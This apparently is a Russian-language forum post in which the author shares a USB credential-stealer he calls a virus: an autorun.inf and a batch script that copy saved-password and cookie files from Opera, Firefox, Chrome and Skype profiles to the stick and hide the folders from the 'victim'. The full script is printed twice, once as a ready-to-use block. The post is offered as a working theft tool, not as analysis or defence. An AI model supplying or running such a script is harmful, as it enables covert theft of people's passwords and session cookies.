здравствуйте! Вы когда нибудь смотрели фильмы где человек вставляет флешку в компьютер и …о чудо пароль вскрыт и секретная информация у него в кармане, я написал немного про другое но и то и другое касается паролей, ладно начинаем.
Я написал вирус, который крадет пароли от лисы, оперы, хрома(у меня не получилось отпишитесь пожалуйста в коментах что не так), скайпа(да да со скайпа на этом сайте не говорили как воровать пароли с него) вставив флешку в компьютер. Вирус у нас будет состоять из двух файлов, первый
Autotun.inf:
[AutoRun] open="file.bat"
Второй файл file.bat:
Создаём 4 папки, теперь сразу понятно где что лежит(Для справки: код %~d0 означает букву диска на котором лежит наш вирус).
@echo off md %~d0\Mozilla md %~d0\Opera md %~d0\Google md %~d0\Skype
Копируем пароли оперы.
CD /D %APPDATA%\Opera\Opera\ copy /y wand.dat %~d0\Opera\ copy /y cookies4.dat %~d0\Opera\
Лисы.
cd %AppData%\Mozilla\Firefox\Profiles\*.default copy /y cookies.sqlite %~d0\Mozilla copy /y key3.db %~d0\Mozilla copy /y signons.sqlite %~d0\Mozilla copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
Хрома.
cd %localappdata%\Google\Chrome\User Data\Default copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
И скайпа.
cd %appdata%\Skype ATTRIB -R -A -S -H xcopy %appdata%\Skype %~d0\Skype /S /C /Q
Делаем папки невидимыми на тот случай если прийдёт жертва и проверит содержимое флешки.
attrib +h %~d0\Mozilla attrib +h %~d0\Opera attrib +h %~d0\Google attrib +h %~d0\Skype
Что бы сохранять традицию напишу для ленивых:
@echo off md %~d0\Mozilla md %~d0\Opera md %~d0\Google md %~d0\Skype CD /D %APPDATA%\Opera\Opera\ copy /y wand.dat %~d0\Opera\ copy /y cookies4.dat %~d0\Opera\ cd %AppData%\Mozilla\Firefox\Profiles\*.default copy /y cookies.sqlite %~d0\Mozilla copy /y key3.db %~d0\Mozilla copy /y signons.sqlite %~d0\Mozilla copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla cd %localappdata%\Google\Chrome\User Data\Default copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google" cd %appdata%\Skype ATTRIB -R -A -S -H xcopy %appdata%\Skype %~d0\Skype /S /C /Q attrib +h %~d0\Mozilla attrib +h %~d0\Opera attrib +h %~d0\Google attrib +h %~d0\Skype